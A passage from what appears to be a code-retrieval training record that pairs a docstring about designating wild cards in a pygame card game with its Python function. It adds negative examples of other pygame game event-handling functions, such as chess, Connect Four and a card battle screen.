"0.5387316", "0.538008", "0.5379806", "0.53773916", "0.5371596", "0.5358439", "0.5356497", "0.53526795", "0.53526795", "0.5352428", "0.53505003", "0.53477186", "0.53469837", "0.53432024", "0.5333044", "0.5330059", "0.53227633", "0.5319683", "0.5319155", "0.5315449", "0.5314008" ]
0.5553602
47
This runs instead of most of nextEvent when Shared_Board is True and there are ambiguous wild cards. It is looking for key strokes to designate ambiguous wild cards in runs. The mouse is ignored until you designate all the wilds (turn phase goes back to play).
def nextEventWildsOnBoard(self):
    if self.controller._state.rules.Shared_Board and self.num_wilds > 0:
        for self.event in pygame.event.get():
            if self.event.type == pygame.QUIT:
                # The window crashed, we should handle this
                print("pygame crash, AAAHHH")
                pygame.quit()
                quit()
            else:
                # in Shared_Board games, check if there are wilds that need to be updated.
                # All other events are ignored until play is finished.
                HandManagement.wildsHiLoGetInput(self)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def nextEvent(self):\n\n if self.controller._state.rules.Shared_Board:\n self.num_wilds = len(self.controller.unassigned_wilds_dict.keys())\n if self.num_wilds > 0:\n self.nextEventWildsOnBoard()\n\n for self.event in pygame.event.get():\n if self.event.type == pygame.QUIT:\n # The window crashed, we should handle this\n print(\"pygame crash, AAAHHH\")\n pygame.quit()\n quit()\n\n if not self.controller._state.rules.Shared_Board and self.num_wilds > 0:\n wild_instructions = 'Use the keyboard to designate your prepared wild cards \\r\\n '\n wild_instructions = wild_instructions + '(use 0 for 10 and J, Q, or K for facecards).'\n self.controller.note = wild_instructions\n pos = pygame.mouse.get_pos()\n\n if self.event.type == pygame.MOUSEBUTTONDOWN:\n self.RuleSetsButtons.ClickedButton(self, pos)\n for element in self.hand_info:\n # cannot select prepared cards, so not included in logic below.\n if element.img_clickable.isOver(pos):\n if element.status == 1:\n element.status = 0\n element.img_clickable.changeOutline(0)\n elif element.status == 0:\n element.status = 1\n element.img_clickable.changeOutline(2)\n\n elif self.event.type == pygame.MOUSEMOTION:\n self.RuleSetsButtons.MouseHiLight(self, pos)\n HandManagement.MouseHiLight(self.hand_info, pos)\n elif self.event.type == pygame.KEYDOWN:\n if self.controller._state.rules.Buy_Option:\n if self.controller.buying_opportunity:\n if self.event.key == pygame.K_y:\n self.controller.wantTopCard(True)\n self.controller.note = 'You have signaled you want to buy the card.'\n elif self.event.key == pygame.K_n:\n self.controller.wantTopCard(False)\n self.controller.note = 'You have signaled you do not want to buy the card.'\n if not self.controller._state.rules.Shared_Board and self.num_wilds > 0:\n HandManagement.ManuallyAssign(self)", "def main(self):\n while 1:\n events = get_gamepad()\n for event in events:\n\n if(event.ev_type == \"Absolute\" ):\n\n if event.code in self.map[GAMEPAD].keys():\n self.absolute_switch[ self.map[GAMEPAD][event.code] ](event.state)\n\n\n if(event.ev_type == \"Key\" ):\n\n if event.code in self.map[GAMEPAD].keys():\n self.btn_switch[ self.map[GAMEPAD][event.code] ](self.map[GAMEPAD][event.code], event.state)\n \n\n\n\n #print(event.ev_type, event.code, event.state)", "def control(self):\n while not (self.game_over() or self.quit):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.quit = True\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_r:\n self.play()\n elif event.key == pygame.K_m:\n self.__init__()\n elif event.key == pygame.K_LEFT and len(self.sequence)>=2:\n self.sequence.pop()\n self.board = self.sequence.pop()\n self.draw()\n elif event.key == pygame.K_1:\n self.tip(1)\n elif event.key == pygame.K_2:\n self.tip(2)\n elif event.key == pygame.K_3:\n self.tip(3)\n elif event.key == pygame.K_4:\n self.tip(4)\n elif event.key == pygame.K_5:\n self.tip(5)\n \n elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\n ## if mouse is pressed get position of cursor ##\n pos = pygame.mouse.get_pos()\n ## check if cursor is on button ##\n for i in range(len(self.buttons)):\n for j in range(len(self.buttons[i])):\n if self.buttons[i][j].collidepoint(pos):\n if self.selected == None:\n self.selected = [i,j]\n elif self.selected == [i,j]:\n self.selected = None\n elif self.board[self.selected[0]][self.selected[1]]==0:\n self.selected = [i,j]\n else:\n if self.move(i,j):\n self.selected = None\n self.draw()\n return True\n else:\n self.selected = None\n self.draw()\n return 
False\n self.draw()\n return False", "def playEvents(self, event):\n mouse = pygame.mouse.get_pressed()\n mpos = pygame.mouse.get_pos()\n # If we use the left click\n if mouse[0]:\n # We convert the position of the mouse according to the grid position and the margin\n x, y = mpos[0] % (self.ts + self.ms), mpos[1] % (self.ts + self.ms)\n if x > self.ms and y > self.ms:\n tile = mpos[0] // self.ts, mpos[1] // self.ts\n if self.in_grid(tile) and tile in self.adjacent():\n self.switch(tile)\n\n if event.type == pygame.KEYDOWN:\n for key, dx, dy in ((pygame.K_s, 0, -1), (pygame.K_z, 0, 1), (pygame.K_d, -1, 0), (pygame.K_q, 1, 0)):\n if event.key == key:\n x, y = self.opentile\n tile = x + dx, y + dy\n if self.in_grid(tile):\n self.switch(tile)\n # Move randomly a tile.\n if event.key == pygame.K_SPACE:\n self.random()\n if event.key == pygame.K_a:\n action = self.agent.play(self.format_tiles())\n reward = self.step(action)[1]\n print(f\"Reward: {reward}\")", "def check_events_battle_screen(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, action, player2):\n for event in pygame.event.get():\n\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n sys.exit()\n\n\n elif event.type == pygame.MOUSEBUTTONDOWN:\n #check click on cards in hand\n for i in range(1,8):\n if Rect((100+145*(i-1)),610,130,180).collidepoint(pygame.mouse.get_pos()):\n battle_screen_hand_click_action('hand',ai_settings,screen,buttons, screen_status, button_status, card_database_filter, user,player2, position = str(i))\n break\n\n for i in range(1,4):\n if Rect(420,(220 + 110*(i-1)),130,80).collidepoint(pygame.mouse.get_pos()):\n battle_screen_battleground_click_action('player2-monster',ai_settings,screen,buttons, screen_status, button_status, card_database_filter, user, player2, position = str(i))\n break\n\n for i in range(4,7):\n if Rect(245, (220 + 110*(i-4)),130,80).collidepoint(pygame.mouse.get_pos()):\n battle_screen_battleground_click_action('player2-monster',ai_settings,screen,buttons, screen_status, button_status, card_database_filter, user, player2, position = str(i))\n break\n\n\n\n if Rect(20,40,130,180).collidepoint(pygame.mouse.get_pos()):\n battle_screen_battleground_click_action('player2-character',ai_settings,screen,buttons, screen_status, button_status, card_database_filter, user, player2)\n\n # win/lost back to main menu button\n if Rect(500, 500, 200, 40).collidepoint(pygame.mouse.get_pos()):\n if screen_status.battle_screen_action_indicator == 'game-end':\n screen_status.battle_screen_display = False\n screen_status.welcome_screen_display = True\n\n if Rect(200, 0, 50, 30).collidepoint(pygame.mouse.get_pos()):\n button_status.rules_display = True\n\n\n # When menu window is on\n if button_status.battle_screen_menu_display == True:\n\n # Turn sound on\n if Rect(447+280, 323-270, 28, 28).collidepoint(pygame.mouse.get_pos()):\n ai_settings.sound_indicator = True\n # Turn sound off\n elif Rect(482+280, 323-270, 28, 28).collidepoint(pygame.mouse.get_pos()):\n ai_settings.sound_indicator = False\n # Turn music on\n elif Rect(447+280, 372-270, 28, 28).collidepoint(pygame.mouse.get_pos()):\n ai_settings.music_indicator = True\n # Turn music off\n elif Rect(482+280, 372-270, 28, 28).collidepoint(pygame.mouse.get_pos()):\n ai_settings.music_indicator = False\n\n # Change Theme\n elif Rect(447+280, 419-270, 98, 35).collidepoint(pygame.mouse.get_pos()):\n ai_settings.theme_indicator = 'Lith Harbor'\n 
change_bg_music('Lith Harbor')\n\n elif Rect(559+280, 419-270, 98, 35).collidepoint(pygame.mouse.get_pos()):\n ai_settings.theme_indicator = 'Leafre'\n change_bg_music('Leafre')\n\n elif Rect(447+280, 468-270, 98, 35).collidepoint(pygame.mouse.get_pos()):\n ai_settings.theme_indicator = 'Pantheon'\n change_bg_music('Pantheon')\n\n elif Rect(559+280, 468-270, 98, 35).collidepoint(pygame.mouse.get_pos()):\n ai_settings.theme_indicator = 'Ellinia'\n change_bg_music('Ellinia')\n\n # change AI speeding\n elif Rect(475+280, 524-270, 56, 35).collidepoint(pygame.mouse.get_pos()):\n ai_settings.AI_speed_indicator = '1000'\n\n elif Rect(545+280, 524-270, 56, 35).collidepoint(pygame.mouse.get_pos()):\n ai_settings.AI_speed_indicator = '2000'\n\n elif Rect(615+280, 524-270, 56, 35).collidepoint(pygame.mouse.get_pos()):\n ai_settings.AI_speed_indicator = '3000'\n\n # Quit settings window\n elif Rect(699+280, 300-270, 21, 21).collidepoint(pygame.mouse.get_pos()):\n button_status.battle_screen_menu_display = False\n\n # Concede and back to main menu\n elif Rect(700, 310, 180, 40).collidepoint(pygame.mouse.get_pos()):\n screen_status.battle_screen_action_indicator = 'game-end'\n button_status.battle_screen_win_lost_indicator = 'lost'\n\n if button_status.rules_display == True:\n # When we click on '>'\n if Rect(640, 37, 20, 20).collidepoint(pygame.mouse.get_pos()):\n if int(button_status.rules_page_id) < 4:\n button_status.rules_page_id = str(int(button_status.rules_page_id)+1)\n else:\n pass\n # When we click on '<'\n elif Rect(540, 37, 20, 20).collidepoint(pygame.mouse.get_pos()):\n if int(button_status.rules_page_id) > 1:\n button_status.rules_page_id = str(int(button_status.rules_page_id)-1)\n else:\n pass\n\n elif Rect(975, 35, 25, 25).collidepoint(pygame.mouse.get_pos()):\n button_status.rules_display = False\n\n\n\n\n if rect_union(buttons).collidepoint(pygame.mouse.get_pos()):\n for button in buttons:\n if button.rect.collidepoint(pygame.mouse.get_pos()):\n if button.text == 'Menu':\n button_status.battle_screen_menu_display = True\n\n elif button.text == '>':\n screen_status.battle_screen_my_hand_page_id += 1\n button_status.battle_screen_my_hand_indicator_display = False # Turn off display of buttons when change page\n\n if (screen_status.battle_screen_action_indicator == 'stage-1-level-up'\n or screen_status.battle_screen_action_indicator == 'stage-2-other-action-detail-spawn-and-think-fast'\n or screen_status.battle_screen_action_indicator == 'stage-2-other-action-detail-spawn-and-equip'\n or screen_status.battle_screen_action_indicator == 'stage-2-other-action-detail-think-fast-and-equip'\n or screen_status.battle_screen_action_indicator == 'stage-2-other-action-detail-spawn'\n or screen_status.battle_screen_action_indicator == 'stage-2-other-action-detail-think-fast'\n or screen_status.battle_screen_action_indicator == 'stage-2-other-action-detail-equip'\n ):\n button_status.battle_screen_instruction_bar_yes_display = False\n button_status.battle_screen_instruction_bar_yes_backend = False\n\n elif button.text == '<':\n screen_status.battle_screen_my_hand_page_id -= 1\n button_status.battle_screen_my_hand_indicator_display = False\n\n if (screen_status.battle_screen_action_indicator == 'stage-1-level-up'\n or screen_status.battle_screen_action_indicator == 'stage-2-other-action-detail-spawn-and-think-fast'\n or screen_status.battle_screen_action_indicator == 'stage-2-other-action-detail-spawn-and-equip'\n or screen_status.battle_screen_action_indicator == 
'stage-2-other-action-detail-think-fast-and-equip'\n or screen_status.battle_screen_action_indicator == 'stage-2-other-action-detail-spawn'\n or screen_status.battle_screen_action_indicator == 'stage-2-other-action-detail-think-fast'\n or screen_status.battle_screen_action_indicator == 'stage-2-other-action-detail-equip'\n ):\n button_status.battle_screen_instruction_bar_yes_display = False\n button_status.battle_screen_instruction_bar_yes_backend = False\n\n elif button.text == 'level up':\n battle_screen_hand_click_action('level up',ai_settings,screen,buttons, screen_status, button_status, card_database_filter, user, player2)\n elif button.text == 'Yes':\n battle_screen_instruction_bar_yes_skip_action('yes',ai_settings,screen,buttons, screen_status, button_status, card_database_filter, user,action,player2)\n elif button.text == 'Skip':\n battle_screen_instruction_bar_yes_skip_action('skip',ai_settings,screen,buttons, screen_status, button_status, card_database_filter, user, action, player2)\n\n\n elif event.type == pygame.MOUSEMOTION: # Mostly for zoom in\n x = 0 # indicator helps remove zoom in.\n for i in range(1,8):\n if Rect((100+145*(i-1)),610,130,180).collidepoint(pygame.mouse.get_pos()):\n button_status.card_zoom_active = True\n button_status.card_zoom_screen_indicator = 'battle_screen'\n button_status.card_zoom_part_indicator = 'hand'\n button_status.card_zoom_position_indicator = str(i)\n x = 1\n\n for i in range(1,16):\n if Rect(1050,(220 + 23 * (i-1)),130,23).collidepoint(pygame.mouse.get_pos()):\n button_status.card_zoom_active = True\n button_status.card_zoom_screen_indicator = 'battle_screen'\n button_status.card_zoom_part_indicator = 'character 1 under'\n button_status.card_zoom_position_indicator = str(i)\n x = 1\n\n for i in range(1,16):\n if Rect(20,(220 + 23 * (i-1)),130,23).collidepoint(pygame.mouse.get_pos()):\n button_status.card_zoom_active = True\n button_status.card_zoom_screen_indicator = 'battle_screen'\n button_status.card_zoom_part_indicator = 'character 2 under'\n button_status.card_zoom_position_indicator = str(i)\n x = 1\n\n\n if Rect(1050,40,130,180).collidepoint(pygame.mouse.get_pos()):\n button_status.card_zoom_active = True\n button_status.card_zoom_screen_indicator = 'battle_screen'\n button_status.card_zoom_part_indicator = 'character 1'\n x = 1\n\n if Rect(20,40,130,180).collidepoint(pygame.mouse.get_pos()):\n button_status.card_zoom_active = True\n button_status.card_zoom_screen_indicator = 'battle_screen'\n button_status.card_zoom_part_indicator = 'character 2'\n x = 1\n\n if Rect(880, 5, 50, 20).collidepoint(pygame.mouse.get_pos()):\n button_status.battle_screen_history_bar_detail_display = True\n x = 1\n\n if x == 0:\n button_status.card_zoom_active = False\n button_status.battle_screen_history_bar_detail_display = False\n\n\n\n elif event.type == pygame.MOUSEBUTTONUP:\n pass", "def run_game(self, board):\n run_program = True\n\n while run_program:\n # eventlistener for mouse events\n for event in pygame.event.get():\n if pygame.mouse.get_pressed() and event.type == pygame.MOUSEBUTTONDOWN:\n if event.type == pygame.MOUSEBUTTONDOWN:\n # Get position of mouse.\n (x, y) = pygame.mouse.get_pos()\n\n # Set circle position in the middle of the grid_square.\n draw_x = x - (x % self.square_size) + self.square_mid\n\n # Calculation to get xPosition from selected Mouse xPosition.\n x = x // 80\n\n # Check if column is full before placing. 
Break out if that's the case.\n if self.check_if_column_full(board, x):\n break\n\n # Calculate the yPosition, where the chip should be placed with various helper methods.\n draw_y = self.height - (self.square_size * self.draw_dict_mapping[self.get_y_pos(board, x)]) + 40\n\n # Check, which players turn it is.\n if self.playerOne:\n # Player Ones turn.\n pos = (x, self.get_y_pos(board, x))\n if board[pos] == 0:\n board[pos] = 1\n self.draw_circle(draw_x, draw_y, self.playerOne)\n self.screen.blit(self.background, (0, 0))\n if self.check_if_user_won(board, pos, 1):\n run_program = False\n self.switch_player()\n else:\n # Player Twos turn.\n pos = (x, self.get_y_pos(board, x))\n if board[pos] == 0:\n board[pos] = 2\n self.draw_circle(draw_x, draw_y, self.playerOne)\n self.screen.blit(self.background, (0, 0))\n if self.check_if_user_won(board, pos, 2):\n run_program = False\n self.switch_player()\n\n if event.type == pygame.KEYDOWN:\n # End the game with escape.\n if event.key == pygame.K_ESCAPE:\n self.draw = True\n run_program = False\n\n # End the Program with the X in the upper right corner.\n elif event.type == pygame.QUIT:\n self.draw = True\n run_program = False\n\n pygame.display.flip()\n self.game_over(self.playerOne, self.draw)\n # wait for given time and end the game\n pygame.time.wait(5000)\n pygame.quit()", "def event2513():\n header(2513)\n\n if_player_does_not_have_special_effect(7, SPEFFECT.RunicHit0)\n if_player_does_not_have_special_effect(7, SPEFFECT.RunicHit1)\n if_player_does_not_have_special_effect(7, SPEFFECT.RunicHit2)\n if_player_does_not_have_special_effect(7, SPEFFECT.RunicHit3)\n if_player_does_not_have_special_effect(7, SPEFFECT.RunicHit4)\n if_player_does_not_have_special_effect(7, SPEFFECT.RunicHit5)\n if_condition_true(0, 7)\n\n if_event_flag_on(1, EVENT.ScintillaRuneActive)\n\n if_player_has_special_effect(-1, SPEFFECT.RunicHit0)\n if_player_has_special_effect(-1, SPEFFECT.RunicHit1)\n if_player_has_special_effect(-1, SPEFFECT.RunicHit2)\n if_player_has_special_effect(-1, SPEFFECT.RunicHit3)\n if_player_has_special_effect(-1, SPEFFECT.RunicHit4)\n if_player_has_special_effect(-1, SPEFFECT.RunicHit5)\n if_condition_true(1, -1)\n\n if_condition_true(0, 1)\n\n # Roll d30.\n flag.disable_chunk(970, 999)\n flag.enable_random_in_chunk(970, 999)\n\n # Count appropriate flag range as success and spawn Scintilla projectile.\n if_player_has_special_effect(2, SPEFFECT.RunicHit0)\n skip_if_condition_false(4, 2)\n if_at_least_one_true_flag_in_range(-2, 970, 971) # 2/30 chance at Scintilla level 0.\n restart_if_condition_false(-2)\n spawner.shoot_projectile(CHR.Player, projectile_entity_id=CHR.Player, damipoly_id=7, behavior_id=2001)\n restart()\n\n if_player_has_special_effect(3, SPEFFECT.RunicHit1)\n skip_if_condition_false(4, 3)\n if_at_least_one_true_flag_in_range(-2, 970, 972) # 3/30 chance at Scintilla level 1.\n restart_if_condition_false(-2)\n spawner.shoot_projectile(CHR.Player, projectile_entity_id=CHR.Player, damipoly_id=7, behavior_id=2001)\n restart()\n\n if_player_has_special_effect(4, SPEFFECT.RunicHit2)\n skip_if_condition_false(4, 4)\n if_at_least_one_true_flag_in_range(-2, 970, 973) # 4/30 chance at Scintilla level 2.\n restart_if_condition_false(-2)\n spawner.shoot_projectile(CHR.Player, projectile_entity_id=CHR.Player, damipoly_id=7, behavior_id=2001)\n restart()\n\n if_player_has_special_effect(5, SPEFFECT.RunicHit3)\n skip_if_condition_false(4, 5)\n if_at_least_one_true_flag_in_range(-2, 970, 974) # 5/30 chance at Scintilla level 3.\n 
restart_if_condition_false(-2)\n spawner.shoot_projectile(CHR.Player, projectile_entity_id=CHR.Player, damipoly_id=7, behavior_id=2001)\n restart()\n\n if_player_has_special_effect(6, SPEFFECT.RunicHit4)\n skip_if_condition_false(4, 6)\n if_at_least_one_true_flag_in_range(-2, 970, 975) # 6/30 chance at Scintilla level 4.\n restart_if_condition_false(-2)\n spawner.shoot_projectile(CHR.Player, projectile_entity_id=CHR.Player, damipoly_id=7, behavior_id=2001)\n restart()\n\n if_player_has_special_effect(-3, SPEFFECT.RunicHit5)\n restart_if_condition_false(-3) # This shouldn't happen.\n if_at_least_one_true_flag_in_range(-2, 970, 972) # 3/30 chance of Crystal Scintilla at level 5.\n skip_if_condition_false(2, -2)\n spawner.shoot_projectile(CHR.Player, projectile_entity_id=CHR.Player, damipoly_id=7, behavior_id=2002)\n skip(2)\n if_at_least_one_true_flag_in_range(-4, 973, 976) # 4/30 chance of normal Scintilla at level 5.\n skip_if_condition_false(1, -4)\n spawner.shoot_projectile(CHR.Player, projectile_entity_id=CHR.Player, damipoly_id=7, behavior_id=2001)\n restart()", "def events(self):\n # catch all events here\n for event in pg.event.get():\n if event.type == pg.QUIT:\n self.quit_game()\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_ESCAPE:\n menu.paused = True\n menu.pause_menu() #code gets stuck in this call until a button is pressed in the pause menu\n self.clock=pg.time.Clock()\n if event.key == pg.K_h:\n self.draw_debug = not self.draw_debug\n if event.key == pg.K_o:\n if self.flashlight.on:#turning off flashlight\n self.darkness.on = True\n self.battery.duration-=pg.time.get_ticks()-self.battery.last_update\n self.flashlight.on=False\n else: #turning on flashlight\n self.darkness.on = False\n self.battery.last_update=pg.time.get_ticks()\n self.flashlight.on=True\n\n #darkness condition\n if self.transition:\n self.darkness_transition(self.player)\n self.kidnap(self.player)\n\n # win condition\n if pg.sprite.spritecollide(self.player, self.win, False, collide_hit_rect):\n menu.win_menu()\n\n #got hit condition\n hit=pg.sprite.spritecollide(self.player, self.threat, False, collide_hit2_rect)\n if hit:\n self.hit(self.player, hit[0])\n \n #mirror\n self.portal(self.player)\n self.portal(self.monster)", "def main_board_maintenance(self,x_cor,y_cor):\r\n\t\r\n\t\tfor event in pygame.event.get(): \r\n\r\n\t\t\tif event.type == pygame.QUIT:\r\n\t\t\t\tpygame.display.quit()\r\n\t\t\t\tpygame.quit()\r\n\t\t\t\tquit()\r\n\t\t\t\r\n\t\t\tif event.type == pygame.MOUSEBUTTONDOWN:\r\n\r\n\t\t\t\tx_adjusted,y_adjusted = Helping_Class.convert_coordinate(x_cor,y_cor,from_where ='board')\r\n\t\t\t\t#print(x_adjusted/80,y_adjusted/80)\r\n\r\n\t\t\t\tif self.selected_from_selection_bar :\r\n\t\t\t\t\t#print('inside selection bar selection option')\r\n\t\t\t\t\tx_adjusted,y_adjusted = Helping_Class.convert_coordinate(x_cor,y_cor,from_where ='board')\r\n\t\t\t\t\ttemp_game_state = CP.game_data()\r\n\t\t\t\t\ttemp_game_state = copy.deepcopy(self.game_state)\r\n\t\t\t\t\tdata_convert = CP.Conversion_of_postion_name(self.selected_piece,Helping_Class.selection_bar_reverse_mapping[self.selected_piece] ,(x_adjusted,y_adjusted))\r\n\t\t\t\t\ttemp_game_state.update(data_convert.piece, int(data_convert.i_pos_ani()), int(data_convert.f_pos_ani()))\r\n\t\t\t\t\ttemp_game_state.active_color = not temp_game_state.active_color\r\n\t\t\t\t\tfen = temp_game_state.generate_fen()\r\n\t\t\t\t\tboard2 = 
chess.Board(fen=fen)\r\n\t\t\t\t\tprint(board2)\r\n\t\t\t\t\tprint(fen)\r\n\t\t\t\t\tprint('board2.is_check()',board2.is_check())\r\n\t\t\t\t\t\r\n\t\t\t\t\t#now we need to place the piece on board\r\n\t\t\t\t\tif self.game_state.board[Helping_Class.convert_my_coordinate_to_anirudh(x_adjusted,y_adjusted)] == None:\r\n\t\t\t\t\t\t#print(self.selected_position)\r\n\t\t\t\t\t\tif not board2.is_check():\r\n\t\t\t\t\t\t\tif self._check_valid_position_(x_adjusted,y_adjusted):\r\n\t\t\t\t\t\t\t\tself.place_piece_on_board_from_selection_bar(x_adjusted,y_adjusted)\r\n\t\t\t\t\t\t\t\t#rajan's\r\n\t\t\t\t\t\t\t\t#print(self.selected_piece)\r\n\t\t\t\t\t\t\t\t#print(self.selected_position)\r\n\t\t\t\t\t\t\t\tdata_convert = CP.Conversion_of_postion_name(self.selected_piece,self.selected_position ,(x_adjusted,y_adjusted))\r\n\t\t\t\t\t\t\t\tself.game_state.update(data_convert.piece, int(data_convert.i_pos_ani()), int(data_convert.f_pos_ani()))\r\n\t\t\t\t\t\t\t\tself.selected_piece = None\r\n\t\t\t\t\t\t\t\tself.selected_position = None\r\n\r\n\t\t\t\t\t\t\t\tself.computer_turn =True\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tpass\r\n\t\t\t\t\t#board position is filled then nothing to do\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\t#if his piece change selection\r\n\t\t\t\t\t\tself.selected_from_selection_bar =False\r\n\t\t\t\t\t\tself.selected_from_board = True\r\n\t\t\t\t\t\tself.selected_piece = self.anirudh_2_pritish[self.game_state.board[Helping_Class.convert_my_coordinate_to_anirudh(x_adjusted,y_adjusted)]]\r\n\t\t\t\t\t\tself.selected_position = (x_adjusted,y_adjusted)\r\n\r\n\r\n\t\t\t\telif self.selected_from_board:\r\n\t\t\t\t\t#print('inside selection bar board option')\r\n\t\t\t\t\tx_adjusted,y_adjusted = Helping_Class.convert_coordinate(x_cor,y_cor,from_where ='board')\r\n\t\t\t\t\t\r\n\t\t\t\t\tomega = True\r\n\t\t\t\t\tif self.selected_position:\r\n\t\t\t\t\t\tif self.selected_position == (x_adjusted,y_adjusted):\r\n\t\t\t\t\t\t\tomega = False\r\n\t\t\t\t\t#print(self.selected_position,(x_adjusted,y_adjusted))\r\n\t\t\t\t\tif omega:\r\n\t\t\t\t\t\tmove = self._check_valid_move_(x_adjusted,y_adjusted)\r\n\t\t\t\t\t\tprint(move)\r\n\t\t\t\t\tif omega:\r\n\t\t\t\t\t\tif move:\r\n\t\t\t\t\t\t\tself.computer_turn = True\r\n\t\t\t\t\t\t\t#if move contains x then we have update state of captured piece\r\n\t\t\t\t\t\t\t#else just update selected piece\r\n\t\t\t\t\t\t\t#print(\"correct move\")\r\n\t\t\t\t\t\t\tself.capture_piece_update_board_or_place_piece(move,x_adjusted,y_adjusted)\r\n\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t#select the piece\r\n\t\t\t\t\t\t\tif self.game_state.board[Helping_Class.convert_my_coordinate_to_anirudh(x_adjusted,y_adjusted)]:\r\n\t\t\t\t\t\t\t\tself.selected_piece = self.anirudh_2_pritish[self.game_state.board[Helping_Class.convert_my_coordinate_to_anirudh(x_adjusted,y_adjusted)]]\r\n\t\t\t\t\t\t\t\tself.selected_position = (x_adjusted,y_adjusted)\r\n\t\t\t\t\t\t\t\tself.selected_from_board = True\r\n\t\t\t\t\t\r\n\t\t\t\telse:\r\n\t\t\t\t\t\r\n\t\t\t\t\tx_adjusted,y_adjusted = Helping_Class.convert_coordinate(x_cor,y_cor,from_where ='board')\r\n\t\t\t\t\tif self.game_state.board[Helping_Class.convert_my_coordinate_to_anirudh(x_adjusted,y_adjusted)]:\r\n\t\t\t\t\t\t#select the piece\r\n\t\t\t\t\t\tif self.whose_move == 'white':\r\n\t\t\t\t\t\t\tif 'W' in self.anirudh_2_pritish[self.game_state.board[Helping_Class.convert_my_coordinate_to_anirudh(x_adjusted,y_adjusted)]]:\r\n\t\t\t\t\t\t\t\tself.selected_piece = 
self.anirudh_2_pritish[self.game_state.board[Helping_Class.convert_my_coordinate_to_anirudh(x_adjusted,y_adjusted)]]\r\n\t\t\t\t\t\t\t\tself.selected_from_board = True\r\n\t\t\t\t\t\t\t\tself.selected_position = (x_adjusted,y_adjusted)\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t#nothing to do\r\n\t\t\t\t\t\t\t\tpass\r\n\t\t\t\t\t\telif self.whose_move == 'black':\r\n\t\t\t\t\t\t\tif 'B' in self.anirudh_2_pritish[self.game_state.board[Helping_Class.convert_my_coordinate_to_anirudh(x_adjusted,y_adjusted)]]:\r\n\t\t\t\t\t\t\t\tself.selected_piece = self.anirudh_2_pritish[self.game_state.board[Helping_Class.convert_my_coordinate_to_anirudh(x_adjusted,y_adjusted)]]\r\n\t\t\t\t\t\t\t\tself.selected_from_board = True\r\n\t\t\t\t\t\t\t\tself.selected_position = (x_adjusted,y_adjusted)\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t#nothing to do\r\n\t\t\t\t\t\t\t\tpass\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\t#it is none means nothing is their so nothing to do\r\n\t\t\t\t\t\tpass\r\n\t\t\t\t\t\r\n\t\t\t\r\n\r\n\t\t\telse:\r\n\t\t\t\t#print(\"not_pressed\")\r\n\t\t\t\tpass", "def _check_keydown_play_events(self, event):\n\t\tif (event.key in (pygame.K_SPACE, pygame.K_UP)) and (\n\t\t\tself.bolan.rect.y >= self.bolan.default_y):\n\t\t\tself.bolan.is_jump = True\n\t\tif event.key == pygame.K_DOWN:\n\t\t\tself.bolan.is_duck = True", "def main():\n p.init() # Initializing pygame object\n screen = p.display.set_mode((WIDTH, HEIGHT))\n clock = p.time.Clock()\n screen.fill(p.Color(\"white\"))\n gs = ChessEngine.GameState()\n\n valid_moves = gs.get_valid_moves()\n\n # Flag to control the number of times get valid moves is called\n # Only if the user makes a valid move, it is called\n move_made = False\n\n load_images()\n game_running = True\n\n sq_selected = tuple() # (row, col), keeps track of user click\n player_clicks = list() # 2 tuples in the list, [(row, col), (row, col)]\n\n while game_running:\n\n for e in p.event.get():\n if e.type == p.QUIT:\n game_running = False\n\n elif e.type == p.KEYDOWN:\n if e.key == p.K_z: # undo when 'z' is pressed\n gs.undo_move()\n move_made = True # On undo we need to generate all valid moves again\n\n elif e.type == p.MOUSEBUTTONDOWN:\n location = p.mouse.get_pos() # Gets (col, row) location of mouse click\n row = location[1] // SQ_SIZE\n col = location[0] // SQ_SIZE\n\n # If user clicks on the same square again, i.e. 
as source and destination,\n # then we deselect it and reset player clicks\n if sq_selected == (row, col):\n sq_selected = tuple()\n player_clicks = list()\n else:\n if not (len(player_clicks) == 0 and gs.board[row][col] == gs.EMPTY_SQ):\n sq_selected = (row, col)\n player_clicks.append(sq_selected) # Append both first and second clicks\n\n # After second click only\n if len(player_clicks) == 2:\n move = ChessEngine.Move(start_sq=player_clicks[0], end_sq=player_clicks[1], board=gs.board)\n # move.print_move()\n for i in range(len(valid_moves)):\n\n if move == valid_moves[i]:\n gs.make_move(valid_moves[i])\n move_made = True\n\n player_clicks = list() # Resetting to restart the 2 click move logic\n sq_selected = tuple()\n if not move_made:\n player_clicks = [sq_selected]\n\n if move_made:\n valid_moves = gs.get_valid_moves()\n move_made = False\n\n draw_game_state(screen, gs)\n clock.tick(MAX_FPS)\n p.display.flip()", "def play(self):\n self.accept(\"wheel_up\", self.scrollindex, [-1] )\n self.accept(\"wheel_down\", self.scrollindex, [1] )\n self.accept(\"arrow_up\", self.scrollindex, [-1] )\n self.accept(\"arrow_down\", self.scrollindex, [1] )\n self.accept(\"enter\", self._click)\n if callable(self.data['exit']): self.accept(\"escape\", self.data['exit'])\n for item in self.canvas[\"items\"]: item['state']=DGG.NORMAL", "def run_game():\n mainBoard = get_new_board()\n resetBoard(mainBoard)\n showHints = False\n\n turn = random.choice(['computer', 'player'])\n\n # Draw the starting board and ask the player what color they want.\n draw_board(mainBoard)\n\n playerTile, computer_tile = enter_player_tile()\n # Make the Surface and Rect objects for the \"New Game\" and \"Hints\" buttons\n\n newGameSurf = FONT.render('New Game', True, TEXTCOLOR, TEXTBGCOLOR2)\n newGameRect = newGameSurf.get_rect()\n newGameRect.topright = (WINDOWWIDTH - 8, 10)\n\n hintsSurf = FONT.render('Hints', True, TEXTCOLOR, TEXTBGCOLOR2)\n hintsRect = hintsSurf.get_rect()\n hintsRect.topright = (WINDOWWIDTH - 8, 40)\n\n while True: # main game loop\n # Keep looping for player and computer's turns.\n if turn == 'player':\n # Player's turn:\n if get_valid_moves(mainBoard, playerTile) == []:\n # If it's the player's turn but they\n # 